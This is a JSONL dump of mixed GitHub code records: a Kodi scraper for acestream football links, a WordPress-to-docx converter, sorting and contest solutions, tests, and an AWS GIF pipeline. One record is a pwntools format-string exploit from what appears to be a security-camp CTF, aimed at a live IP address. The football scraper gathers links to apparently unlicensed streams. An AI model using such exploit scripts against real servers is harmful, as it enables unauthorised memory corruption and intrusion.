'competition': tools.str_sanitize(league),\n 'event': tools.str_sanitize(a_event[3]),\n 'channel_url': a_event[1],\n 'name': self.__get_event_name(\n tools.str_sanitize(a_event[3]),\n c_date[0],\n tools.str_sanitize(a_event[0]),\n tools.str_sanitize(league)),\n 'icon': competition_art['icon'],\n 'fanart': competition_art['fanart']\n }\n )\n\n if len(events) == 0:\n raise WebSiteError(\n u'Problema en la agenda',\n u'Está vacía o no hay enlaces, puedes comprobarlo en la Web',\n time=self.__settings['notify_secs']\n )\n\n # Guarda los eventos en caché\n cache.save(urls['agenda'], events)\n\n return events\n\n @staticmethod\n def __get_competition_name(event, leagues):\n for league in leagues:\n if event == league[1]:\n return league[0]\n return 'Futbol'\n\n def get_events_today_and_tomorrow(self):\n \"\"\"\n Get today and tomorrow LiveFootbalLOL events\n\n :return: The list of LiveFootbalLOL events\n :rtype: list\n \"\"\"\n today_tomorrow = []\n today = datetime.datetime.now()\n events = self.get_all_events()\n\n for event in events:\n try:\n if int(event['date'][:2]) == int(today.strftime('%d')) or \\\n int(event['date'][:2]) == int((today + datetime.timedelta(days=1)).strftime('%d')):\n today_tomorrow.append(event)\n except ValueError:\n tools.write_log(\"Fecha '%s' de '%s' incorrecta\" % (event['date'], event['name']), xbmc.LOGERROR)\n\n return today_tomorrow\n\n def get_events_by_competition(self, competition):\n \"\"\"\n Get LiveFootbalLOL events by a given competition\n\n :param competition: The competition name\n :type: competition: str\n :return: The list of LiveFootbalLOL events\n :rtype: list\n \"\"\"\n competitions = []\n events = self.get_all_events()\n\n for event in events:\n if event['competition'] == competition:\n competitions.append(event)\n\n return competitions\n\n def get_competitions(self):\n competition_events = []\n competitions = []\n competitions_list = []\n events = self.get_all_events()\n\n # Lista de competiciones en la guía\n for event in events:\n if not event['competition'] in competitions:\n competitions.append(event['competition'])\n\n # Construye la lista competiciones: añade al título el número de eventos que contiene\n for competition in competitions:\n competition_events[:] = []\n competition_art = self.__get_competition_art(competition)\n for event in events:\n if event['competition'] == competition:\n competition_events.append(competition)\n competitions_list.append({\n 'name': '[B]%s[/B] (%i)' % (lang.translate(competition), len(competition_events)),\n 'competition_id': competition,\n 'icon': competition_art['icon'],\n 'fanart': competition_art['fanart']\n })\n\n return competitions_list\n\n def get_channels(self, event_url):\n \"\"\"\n Get LiveFootbalLOL channels by a given event URL\n\n :param event_url: The event URL\n :type: event_url: str\n :return: The list of LiveFootbalLOL event links\n :rtype: list\n \"\"\"\n cache = Cache(self.__settings['path'], minutes=10)\n\n # Monta la URL del evento\n e_url = '%s%s' % (self.__web_url[:-1] if event_url.startswith('/') else self.__web_url, event_url)\n\n # Busca los canales del evento en caché\n channels = cache.load(e_url, True)\n if channels:\n return channels\n\n # Los datos de los canales no están en cache\n # Vuelve a obtenerlos\n channels = []\n\n # GET e_url\n page = tools.get_web_page(e_url)\n\n # Busca la jornada\n # match_week = re.findall(r'[Mm][Aa][Tt][Cc][Hh]\\s[Ww][Ee]{2}[Kk]</td>\\s*<td>([0-9]+)</td>', page, re.U)\n\n # Obtiene la tabla de datos de los canales\n soup = BeautifulSoup(page, 'html5lib')\n table = soup.find('table', attrs={'class': 'uk-table uk-table-hover uk-table-striped'})\n\n # Obtiene los datos de los canales\n prev_lang = None\n for row in table.findAll(\"tr\")[2:]:\n cells = row.findAll(\"td\")\n\n # Obtiene los datos generales del canal\n ch_name = tools.str_sanitize(cells[1].get_text())\n ch_lang = tools.str_sanitize(cells[0].get_text())\n\n # ¿Hay ya enlaces?\n if 'will be here' in ch_name:\n match = re.findall(r'[Mm][Aa][Tt][Cc][Hh]</td>\\s*<td><strong>(.*)</strong></td>', page, re.U)\n if len(channels) > 0:\n break\n else:\n raise WebSiteError(\n match[0] if match else u'LiveFootbalLOL',\n u'Todavía no se han publicado los enlaces del partido',\n time=self.__settings['notify_secs']\n )\n\n # Si no es un enlace acestream continua\n ch_link = tools.str_sanitize(cells[1].find('a').get('href'))\n if not ch_link or 'acestream' not in ch_name.lower():\n continue\n\n # Obtiene el idioma\n if not ch_lang or not re.findall(r'(\\[[A-Z]{2}\\])', ch_lang, re.U):\n ch_lang = prev_lang if prev_lang else '[--]'\n prev_lang = ch_lang if ch_lang else '[--]'\n\n # Obtiene los datos extendidos y los hashlinks del canal\n channel_data = self.__get_channel_data(cache, ch_link)\n if channel_data:\n for link in channel_data['links']:\n channels.append(\n {\n 'name': self.__get_channel_name(\n channel_data['name'],\n channel_data['bitrate'],\n link['hd'],\n ch_lang),\n 'icon': art.get_channel_icon(channel_data['name'], self.__settings['path']),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg'),\n 'hash': link['hash']\n }\n )\n\n if len(channels) == 0:\n match = re.findall(r'[Mm][Aa][Tt][Cc][Hh]</td>\\s*<td><strong>(.*)</strong></td>', page, re.U)\n raise WebSiteError(\n u'%s' % (match[0]) if match else u'LiveFootbalLOL.me',\n u'Hay enlaces del partido pero no son de acestream. Inténtalo más tarde...',\n time=self.__settings['notify_secs']\n )\n\n # Guarda los eventos en caché\n cache.save(e_url, channels)\n\n return channels\n\n @staticmethod\n def __get_channel_data(cache, url):\n \"\"\"\n Get channel data for an URL\n\n :param url: The channel URL\n :type: url: str\n :return: The Acestream channel data\n :rtype: dict\n \"\"\"\n # Busca los datos del canal en caché\n channel_data = cache.load(url, True)\n if channel_data:\n return channel_data\n\n # Los datos del canal no están en cache\n # Vuelve a obtenerlos\n\n # GET url\n page = tools.get_web_page(url)\n\n # Obtiene la tabla de canales\n soup = BeautifulSoup(page, 'html5lib')\n table = soup.find('table', attrs={'class': 'uk-table'})\n\n # Datos del canal\n ch_name = ''\n ch_sign = ''\n ch_rate = ''\n ch_links = []\n\n # Obtiene los datos del canal\n for row in table.findAll(\"tr\"):\n cells = row.findAll(\"td\")\n cell_0 = tools.str_sanitize(cells[0].get_text())\n if len(cells) == 2:\n if 'Name' in cell_0:\n ch_name = tools.str_sanitize(cells[1].get_text())\n elif 'Bitrate' in cell_0:\n ch_rate = tools.str_sanitize(cells[1].get_text())\n elif 'Signal' in cell_0:\n ch_sign = tools.str_sanitize(cells[1].get_text())\n elif 'acestream://' in cell_0:\n hashes = re.findall(\n r'[acestrm:/]*([0-9a-f]{40})', tools.str_sanitize(cells[0].find('a').get('href')), re.U)\n if hashes:\n ch_links.append({\n 'hash': hashes[0],\n 'hd': '(HD)' in cell_0\n })\n\n if len(ch_links) == 0:\n return None\n\n channel_data = {\n 'name': ch_name,\n 'bitrate': ch_rate,\n 'signal': ch_sign,\n 'links': ch_links\n }\n\n # Guarda los datos del canal en caché\n cache.save(url, channel_data)\n return channel_data\n\n @staticmethod\n def __get_channel_name(name, bitrate, is_hd, lang_code):\n color = 'yellow'\n\n kbps = bitrate.split(' ')[0]\n\n if not kbps.isdigit():\n color = 'silver'\n elif int(kbps) >= 2000:\n color = 'lime'\n elif int(kbps) < 1000:\n color = 'red'\n\n return '%s %s [COLOR %s]%s(%s)[/COLOR]' % (name, lang_code, color, '[B](HD)[/B] ' if is_hd else '', bitrate)\n","repo_name":"Makintos/plugin.video.acestream.sports","sub_path":"lib/livefootballol.py","file_name":"livefootballol.py","file_ext":"py","file_size_in_byte":14963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18472402260","text":"from pwn import *\ncontext.log_level = 'DEBUG'\n\ndef p64(n):\n return pack(n, 64, 'little')\n\n# p = process('./secret')\n# gdb.attach(p, gdbscript=('b *0x0000000000400801\\n'))\np = remote('140.110.112.221', 6131)\npayload = b'%10$p' # leak_stack_address\np.recvuntil(b':')\n# buffer locate on offset 8\np.sendline(payload)\nstack_address = int(p.recvuntil(b'\\n').strip(b'\\n').split(b' ')[3].decode(),16)\nstack_address = stack_address - 0x100 + 12\nprint(hex(stack_address))\np.recvuntil(b')')\n# p.sendline(b'N')\n# p.recvuntil(b':')\npayload = b'%%55c%10$hhn' + b'B'*5 + p64(stack_address) # modify stack value b'%55c%10$hhn' + b'B'*5\np.sendline(payload)\n#p.recvuntil(b')')\np.interactive()\n","repo_name":"Stanley137/CyberSecurity_Camp","sub_path":"mythirdpwn_ctf/secret_poc.py","file_name":"secret_poc.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22910229755","text":"import xml.etree.ElementTree as ET\nfrom html.parser import HTMLParser\nfrom docx import Document\nimport datetime\nimport string\nimport requests\nimport pathlib\nimport shutil\nfrom docx.shared import Inches\n\nclass MyHTMLParser(HTMLParser):\n \n def __init__(self, _lastTitle, _lastDate):\n self.doc = Document()\n self.doc.add_heading(_lastTitle, 0)\n self.doc.add_heading(_lastDate, level=1)\n self.imageCounter = 0\n self.imageStack = []\n self.treeStack = []\n super().__init__()\n\n def handle_starttag(self, tag, attrs):\n print(f\"Encountered a start tag:{tag} , {attrs}\")\n if (tag == 'img'):\n for attr in attrs:\n if attr[0] == 'src':\n print(attr[1])\n self.imageCounter = self.imageCounter + 1\n extention = pathlib.Path(attr[1]).suffix\n fileName = './exports/' + str(self.imageCounter) + extention\n print(fileName)\n url = attr[1]\n response = requests.get(url, stream=True)\n with open(fileName, 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)\n del response\n #with open(fileName, 'wb') as f:\n # f.write(requests.get(attr[1]).content)\n self.imageStack.append(fileName)\n self.treeStack.append(tag)\n pass\n\n def handle_endtag(self, tag):\n print(\"Encountered an end tag :\", tag)\n tagtype = self.treeStack.pop()\n pass\n\n def handle_data(self, data):\n strippedString = data.translate(str.maketrans('', '', string.whitespace))\n print(f\"Encountered some data :{len(data)}{len(strippedString)}{data}\")\n if (len(strippedString) > 0):\n if (len(self.treeStack)>0):\n tagtype = self.treeStack[len(self.treeStack)-1]\n if (tagtype == 'p'):\n if (len(self.treeStack) > 1):\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if innertagtype == 'blockquote':\n textToWrite = '\\\"' + data + '\\\"'\n self.doc.add_paragraph(textToWrite)\n else:\n self.doc.add_paragraph(data)\n if (tagtype == 'h1'):\n self.doc.add_heading(data, level=1)\n if (tagtype == 'h2'):\n self.doc.add_heading(data, level=2)\n if (tagtype == 'h3'):\n self.doc.add_heading(data, level=3)\n if (tagtype == 'div'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'figure'):\n self.doc.add_paragraph(data)\n if (tagtype == 'a'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'p'):\n self.doc.add_paragraph(data)\n if (tagtype == 'li'):\n #self.doc.add_paragraph(data)\n innertagtype = self.treeStack[len(self.treeStack)-2]\n if (innertagtype == 'ul'):\n self.doc.add_paragraph(data, style='List Bullet')\n if (tagtype == 'img'):\n fileName = self.imageStack[len(self.treeStack)-1]\n print(f\"write {fileName} to the doc\")\n self.doc.add_picture(fileName, width=Inches(1.25))\n else:\n self.doc.add_paragraph(data)\n else:\n if (len(self.imageStack)>0):\n fileName = self.imageStack.pop()\n print(f\"write {fileName} to the doc\")\n self.doc.add_picture(fileName, width=Inches(1.25))\n \n def write_document(self, title):\n self.doc.save('./exports/'+title+'.docx')\n\ntree = ET.parse('researchandideasdiary.WordPress.2019-07-15.xml')\nroot = tree.getroot()\nprint(root.tag)\nprint(root.items())\nchannel = root.getchildren()[0]\nlistOfTags = []\nfor child in channel.getchildren():\n print(child.tag, child.attrib)\n if child.tag == 'item':\n lastTitle = ''\n lastDate = ''\n lastGuid = ''\n for postdata in child.getchildren():\n listOfTags.append(postdata.tag)\n if (postdata.tag == 'title'):\n print(postdata.text)\n lastTitle = postdata.text\n if (postdata.tag == 'pubDate'):\n print(postdata.text)\n lastDate = postdata.text\n if (postdata.tag == 'guid'):\n print(postdata.text)\n lastGuid = postdata.text\n if postdata.tag == '{http://purl.org/rss/1.0/modules/content/}encoded':\n datestring = 'draft'\n if (lastDate != 'Mon, 30 Nov -0001 00:00:00 +0000'):\n date_time_obj = datetime.datetime.strptime(lastDate, '%a, %d %b %Y %H:%M:%S %z')\n datestring = str(date_time_obj.date())\n print(datestring)\n parser = MyHTMLParser(lastTitle, datestring)\n parser.feed(str(postdata.text))\n parser.write_document('Exp'+datestring+lastTitle)\n\nlistOfUniqueTags = list(set(listOfTags))\nfor tag in listOfUniqueTags:\n print(tag)\n\n ","repo_name":"JapieGreeff/WordPressToDocx","sub_path":"wordpressInDocxOut.py","file_name":"wordpressInDocxOut.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70121702408","text":"# -*- coding: utf-8 -*-\r\n'''\r\n1. В диапазоне натуральных чисел от 2 до 99 определить, сколько из них кратны\r\nкаждому из чисел в диапазоне от 2 до 9.\r\n'''\r\n\r\nstart_range = 2\r\nend_range = 100\r\n\r\nmultiples_min = 2\r\nmultiples_max = 9 + 1\r\n\r\nfor i in range(multiples_min, multiples_max):\r\n count = 0\r\n for itm in range(start_range, end_range):\r\n if (itm % i) == 0:\r\n count += 1\r\n print(f'Числу {i} в диапазоне от {start_range} до {end_range-1} кратны {count} чисел')","repo_name":"darksoul985/Algorithms","sub_path":"lesson_3_task_1.py","file_name":"lesson_3_task_1.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22865427718","text":"import os.path as osp\nimport unittest\n\nimport cv2\n\nfrom modelscope.hub.snapshot_download import snapshot_download\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines import pipeline\nfrom modelscope.pipelines.base import Pipeline\nfrom modelscope.utils.constant import Tasks\nfrom modelscope.utils.test_utils import test_level\n\n\nclass SkinRetouchingTest(unittest.TestCase):\n\n def setUp(self) -> None:\n self.task = Tasks.skin_retouching\n self.model_id = 'damo/cv_unet_skin-retouching'\n self.test_image = 'data/test/images/skin_retouching.png'\n\n def pipeline_inference(self, pipeline: Pipeline, input_location: str):\n result = pipeline(input_location)\n cv2.imwrite('result_skinretouching.png', result[OutputKeys.OUTPUT_IMG])\n print(f'Output written to {osp.abspath(\"result_skinretouching.png\")}')\n\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\n def test_run_by_direct_model_download(self):\n model_dir = snapshot_download(self.model_id)\n skin_retouching = pipeline(Tasks.skin_retouching, model=model_dir)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n @unittest.skipUnless(test_level() >= 0, 'skip test in current test level')\n def test_run_modelhub(self):\n skin_retouching = pipeline(Tasks.skin_retouching, model=self.model_id)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\n def test_run_modelhub_default_model(self):\n skin_retouching = pipeline(Tasks.skin_retouching)\n self.pipeline_inference(skin_retouching, self.test_image)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"modelscope/modelscope","sub_path":"tests/pipelines/test_skin_retouching.py","file_name":"test_skin_retouching.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"73386389129","text":"import cv2\nimport os\nimport re\nimport tempfile\nimport numpy as np\nfrom datetime import date\nfrom PIL import Image\nimport boto3\nimport json\n\nfrom dotenv import load_dotenv, find_dotenv\n\n_ = load_dotenv(find_dotenv())\n\nAWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\n\n\ndef get_video(awssession, today):\n # Download from s3\n s3 = awssession.resource('s3')\n s3_client = awssession.client('s3')\n\n filenames = [\n my_bucket_object.key\n for my_bucket_object in s3.Bucket('bageld-inputs').objects.all()\n ]\n\n videoFile = list(filter(lambda x: today in x, filenames))[0]\n\n player_name = videoFile.split(';')[1].replace('_', ' ')\n tour = videoFile.split(';')[2]\n s3_client.download_file('bageld-inputs', videoFile, videoFile[videoFile.find(';')+1:])\n\n return videoFile[videoFile.find(';')+1:], player_name, tour\n\n\ndef upload_game_params(awssession, player_name, tour):\n s3 = awssession.resource('s3')\n\n params_json = json.dumps(\n {\n 'answerHash': hashAnswer(player_name.upper()),\n 'tour': tour\n }, indent=4)\n\n s3.Bucket('bageld-inputs').put_object(Key='bageld_params.json',\n Body=params_json)\n\n\ndef gen_folders():\n temp_dir = tempfile.TemporaryDirectory()\n\n frames_path = os.path.join(temp_dir.name, \"frames\")\n dilate_path = os.path.join(temp_dir.name,\n \"diff_gray_dilate_frames\") # image 0\n gray_path = os.path.join(temp_dir.name, \"diff_gray_frames\") # image 1\n diff_path = os.path.join(temp_dir.name, \"diff_frames\") # image 2\n\n today = date.today()\n output_path = os.path.join(temp_dir.name, str(today))\n\n os.mkdir(frames_path)\n os.mkdir(dilate_path)\n os.mkdir(gray_path)\n os.mkdir(diff_path)\n os.mkdir(output_path)\n\n return temp_dir, [\n frames_path, dilate_path, gray_path, diff_path, output_path\n ]\n\n\ndef load_video(videoFile, filepath):\n count = 0\n\n cap = cv2.VideoCapture(videoFile) # capturing the video from the given path\n frameRate = cap.get(5) #frame rate - want to bump it up\n x = 1\n\n first_iter = True\n\n while (cap.isOpened()):\n frameId = cap.get(1) #current frame number\n ret, frame = cap.read()\n if (ret != True):\n break\n else:\n filename = f\"{filepath}/frames/frame{str(count).rjust(3, '0')}.jpg\"\n count += 1\n cv2.imwrite(filename, frame)\n # Get average frames\n if first_iter:\n avg = np.float32(frame)\n first_iter = False\n cv2.accumulateWeighted(frame, avg, 0.005)\n background_image = cv2.convertScaleAbs(avg)\n cap.release()\n return background_image\n\n\ndef load_frames(filepath='frames/'):\n col_frames = os.listdir(filepath)\n\n # sort file names\n col_frames.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n # empty list to store the frames\n col_images = []\n\n for i in col_frames:\n # read the frames\n img = cv2.imread(os.path.join(filepath, i))\n # append the frames to the list\n col_images.append(img)\n\n return col_images\n\n\ndef gen_dilated_frames(col_images, background_image, filepath):\n kernel = np.ones((4, 4), np.uint8)\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n gray_diff = cv2.cvtColor(diff_image, cv2.COLOR_BGR2GRAY)\n\n # image thresholding\n ret, thresh = cv2.threshold(gray_diff, 30, 255, cv2.THRESH_BINARY)\n\n # image dilation\n dilated = cv2.dilate(thresh, kernel, iterations=1)\n\n cv2.imwrite(os.path.join(filepath, str(i).rjust(3, '0') + '.png'), dilated)\n\n\ndef gen_gray_frames(col_images, background_image, filepath):\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n gray_diff = cv2.cvtColor(diff_image, cv2.COLOR_BGR2GRAY)\n\n # image thresholding\n ret, thresh = cv2.threshold(gray_diff, 30, 255, cv2.THRESH_BINARY)\n\n cv2.imwrite(os.path.join(filepath, str(i).rjust(3, '0') + '.png'), thresh)\n\n\ndef gen_diff_frames(col_images, background_image, filepath):\n\n for i in range(len(col_images) - 1):\n\n # frame differencing\n\n diff_image = cv2.absdiff(cv2.cvtColor(col_images[i], cv2.COLOR_BGR2RGB),\n cv2.cvtColor(background_image, cv2.COLOR_BGR2RGB))\n\n cv2.imwrite(os.path.join(filepath,\n str(i).rjust(3, '0') + '.png'), diff_image)\n\n\ndef write_video(output_file, input_path, fps=60):\n\n frame_array = []\n file_list = [f for f in os.listdir(input_path)]\n\n file_list.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n for i in range(len(file_list)):\n filename = os.path.join(input_path, file_list[i])\n\n #read frames\n img = cv2.imread(filename)\n try:\n height, width, layers = img.shape\n size = (width, height)\n except:\n pass\n\n #inserting the frames into an image array\n frame_array.append(img)\n\n out = cv2.VideoWriter(output_file, cv2.VideoWriter_fourcc(*'DIVX'), fps,\n size)\n\n for i in range(len(frame_array)):\n # writing to a image array\n out.write(frame_array[i])\n\n out.release()\n\n\ndef write_gif(output_file, input_path):\n frame_array = []\n file_list = [f for f in os.listdir(input_path)]\n file_list.sort(key=lambda f: int(re.sub('\\D', '', f)))\n\n for i in range(0, len(file_list), 4):\n filename = os.path.join(input_path, file_list[i])\n img = Image.open(filename)\n frame_array.append(img)\n\n frame_array[0].save(output_file,\n format='GIF',\n append_images=frame_array[1:],\n save_all=True,\n duration=0,\n loop=0)\n\n\ndef hashAnswer(inputString):\n hash_value = 1\n if len(inputString) == 0:\n return hash_value\n for x in range(len(inputString)):\n ch = ord(inputString[x])\n hash_value = (hash_value * ch) % 100000000 + 1\n return hash_value\n\n\ndef main(cleanup_temp=True):\n today = str(date.today()).replace('-', '')\n\n session = boto3.Session(aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n s3_client = session.client('s3')\n\n videoFile, player_name, tour = get_video(awssession=session, today=today)\n upload_game_params(awssession=session, player_name=player_name, tour=tour)\n\n temp_dir, output_dirs = gen_folders()\n background = load_video(videoFile, temp_dir.name)\n col_images = load_frames(output_dirs[0])\n\n gen_dilated_frames(col_images, background, output_dirs[1])\n write_gif(\"mystery_0.gif\", output_dirs[1])\n\n gen_gray_frames(col_images, background, output_dirs[2])\n write_gif(\"mystery_1.gif\", output_dirs[2])\n\n gen_diff_frames(col_images, background, output_dirs[3])\n write_gif(\"mystery_2.gif\", output_dirs[3])\n\n write_gif(\"mystery_3.gif\", output_dirs[0])\n\n for i in range(4):\n s3_client.upload_file(f'mystery_{i}.gif', 'bagelio-files',\n f'gifs/mystery_{i}.gif')\n\n # need new function to update the database of old games, and delete yesterday's raw video to save s3 space\n\n if cleanup_temp:\n temp_dir.cleanup()\n else:\n return temp_dir\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"liufran1/bageledio","sub_path":"clean_files.py","file_name":"clean_files.py","file_ext":"py","file_size_in_byte":7319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9845972971","text":"import time\na = []\n\nfor x in range(100):\n with open(\"input.txt\",\"r\") as f:\n r = f.readlines()\n for i in r: \n row = i.split(\" \")\n a += [int(j) for j in row if j !=\"\"]\n\n# with open(\"input.txt\",\"r\") as f:\n# r = f.readlines()\n# for i in r: \n# row = i.split(\" \")\n# a += [int(j) for j in row if j]\n\n\n\n\nMIN_MERGE = 32\ndef calcMinRun(n):\n r = 0\n while n >= MIN_MERGE:\n r |= n & 1\n n >>= 1\n return n + r\n\ndef insertionSort(a, s, d):\n for i in range(s + 1, d + 1):\n j = i\n while j > s and a[j] < a[j - 1]:\n a[j], a[j - 1] = a[j - 1], a[j]\n j -= 1\n \ndef merge(a, l, m, r):\n \n len1, len2 = m - l + 1, r - m\n left, right = [], []\n for i in range(0, len1):\n left.append(a[l + i])\n for i in range(0, len2):\n right.append(a[m + 1 + i])\n \n i, j, k = 0, 0, l\n while i < len1 and j < len2:\n if left[i] <= right[j]:\n a[k] = left[i]\n i += 1\n else:\n a[k] = right[j]\n j += 1\n k += 1\n \n while i < len1:\n a[k] = left[i]\n k += 1\n i += 1\n while j < len2:\n a[k] = right[j]\n k += 1\n j += 1\n \ndef timSort(a):\n n = len(a)\n minRun = calcMinRun(n)\n \n for start in range(0, n, minRun):\n end = min(start + minRun - 1, n - 1)\n insertionSort(a, start, end)\n \n size = minRun\n while size < n:\n \n \n for left in range(0, n, 2 * size):\n \n mid = min(n - 1, left + size - 1)\n right = min((left + 2 * size - 1), (n - 1))\n \n if mid < right:\n merge(a, left, mid, right)\n \n size = 2 * size\n\nstartTime = time.time()\ntimSort(a)\nendTime = time.time()\n\n\nprint(\"Tim sort when n=\",len(a))\nprint(\"Durata executie algoritm:\",endTime-startTime,\" secunde\")","repo_name":"poenaruiulian/sorting_algorithms","sub_path":"8_tim_sort.py","file_name":"8_tim_sort.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43428785895","text":"import sys\nimport math\nimport heapq\nfrom collections import deque\nfp = open('gold_mine_chapter_1_input.txt', 'r')\ntnum = int(fp.readline())\ncase = 1\nf = open(\"c1out.txt\", \"w\")\n\nwhile tnum > 0:\n n = int(fp.readline())\n C = fp.readline().split() \n C = [int(ci) for ci in C]\n max_ans = float('-inf')\n adj = [[] for i in range(n)]\n f.write(\"Case #\"+str(case)+\": \")\n for i in range(n-1):\n ab = fp.readline().split()\n a, b = int(ab[0])-1, int(ab[1])-1\n adj[a].append(b)\n adj[b].append(a)\n \n pathsum = [ 0 for i in range(n)]\n pathsum[0] = C[0]\n L = [ 0 for i in range(n)]\n P = [0 for i in range(n)]\n T = [0 for i in range(n)]\n L[0] = 0\n P[0] = -1\n T[0] = 0\n q = deque([(0, -1, 0)])\n H = 0\n while q:\n node, parent, level = q[0]\n q.popleft()\n for x in adj[node]:\n if x == parent:\n continue\n L[x] = level + 1\n P[x] = node\n pathsum[x] = pathsum[node] + C[x]\n q.append((x, node, level+1)) \n H = max(H, level+1) \n\n if H == 0:\n f.write(str(C[0])+\"\\n\")\n tnum -= 1\n case += 1\n continue\n \n nr = int(math.sqrt(H*1.0)) \n #print nr\n\n def dfs(root, node, parent, nr):\n if L[node] < nr:\n T[node] = root\n elif L[node]%nr == 0:\n T[node] = P[node] \n else:\n T[node] = T[P[node]]\n for x in adj[node]:\n if x == parent:\n continue\n dfs(root, x, node, nr)\n\n def LCA(x, y):\n while T[x] != T[y]:\n if L[x] > L[y]:\n x = T[x] \n else: \n y = T[y]\n while x!= y:\n if L[x] > L[y]:\n x = P[x]\n else:\n y = P[y]\n return x \n\n dfs(0, 0,-1, nr)\n for x in adj[0]:\n max_ans = max(max_ans, pathsum[x])\n for i in range(1, n):\n for j in range(1, n):\n if i == j:\n continue\n if i in adj[j]:\n continue\n if LCA(i, j) == 0:\n max_ans = max(max_ans, pathsum[i] + pathsum[j] - C[0])\n \n for i in range(1, n):\n if i not in adj[0]:\n max_ans = max(max_ans, pathsum[i]) \n \n f.write(str(max_ans)+\"\\n\")\n tnum -= 1\n case += 1\nf.close()\n\n","repo_name":"Shadek07/facebook-hacker-cup","sub_path":"2021/Qualification Round/Goldmine_C1/c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"10585986687","text":"import random as r\n\nguess = ['石头', '剪刀', '布', '石头']\nplayer = input(f'{guess[0:3]}:')\nwhile player != 'Q':\n try:\n if player not in guess:\n raise\n CPU = r.choice(guess[0:3])\n print(f'CPU:{CPU}')\n if player == CPU:\n print('Draw!')\n elif guess[guess.index(player) + 1] == CPU:\n print('Player Win!')\n else:\n print('CPU win!')\n player = input(f'{guess[0:3]}:')\n except:\n player = input(f'输入有误!{guess[0:3]}:')\n","repo_name":"JMbaozi/absorb","sub_path":"program/猜拳.py","file_name":"猜拳.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"10774566449","text":"'''\n문제 설명\n양의 정수 n이 매개변수로 주어질 때, n이 홀수라면 n 이하의 홀수인 모든 양의 정수의 합을 return 하고 n이 짝수라면 n 이하의 짝수인 모든 양의 정수의 제곱의 합을 return 하는 solution 함수를 작성해 주세요.\n\n입출력 예\nn\tresult\n7\t16\n10\t220\n'''\n\ndef solution(n):\n answer = 0\n if n%2 == 1: # oddoreven = \"odd\" if n%2 == 1 else \"even\" 변수 정의해 홀짝 판단 if oddoreven == \"odd\": \n for i in range(1, n+1, 2):\n answer += i\n else:\n for i in range(2, n+1, 2):\n answer += i*i\n return answer\n\n\n\n# 다른 사람 풀이\ndef solution(n):\n if n%2: # n%2 == 1 즉, 홀수 일때 실행\n return sum(range(1,n+1,2))\n return sum([i*i for i in range(2,n+1,2)])\n\n","repo_name":"etesongg/CodingTest-Practice","sub_path":"programmers/Lv. 0/9-4주/홀짝에 따라 다른 값 반환.py","file_name":"홀짝에 따라 다른 값 반환.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2943193565","text":"import speech_recognition as sr\nrecog = sr.Recognizer()\nmic = sr.Microphone()\n\ndef sysListen():\n with mic as source:\n recog.adjust_for_ambient_noise(source)\n audio = recog.listen(source)\n \n # setup response\n response = {\n \"success\" : True,\n \"error\" : None,\n \"transcription\" : None\n }\n\n # use Google API\n try:\n response[\"transcription\"] = recog.recognize_google(audio)\n except sr.RequestError:\n # API was unreachable or unresponsive\n response[\"success\"] = False\n response[\"error\"] = \"API unavailable\"\n except sr.UnknownValueError:\n # speech was unintelligible\n response[\"error\"] = \"Unable to recognize speech\"\n\n return response[\"transcription\"]\n\n","repo_name":"Siddhant-Ray/SlideEZ","sub_path":"appUtils.py","file_name":"appUtils.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28918250610","text":"\"\"\"\nThis module consist the CLI of the codeplag util and\nnecessary internal classes for it.\n\"\"\"\nimport argparse\nfrom pathlib import Path\nfrom typing import List, Optional\n\nfrom webparsers.types import GitHubContentUrl\n\nfrom codeplag.consts import (\n 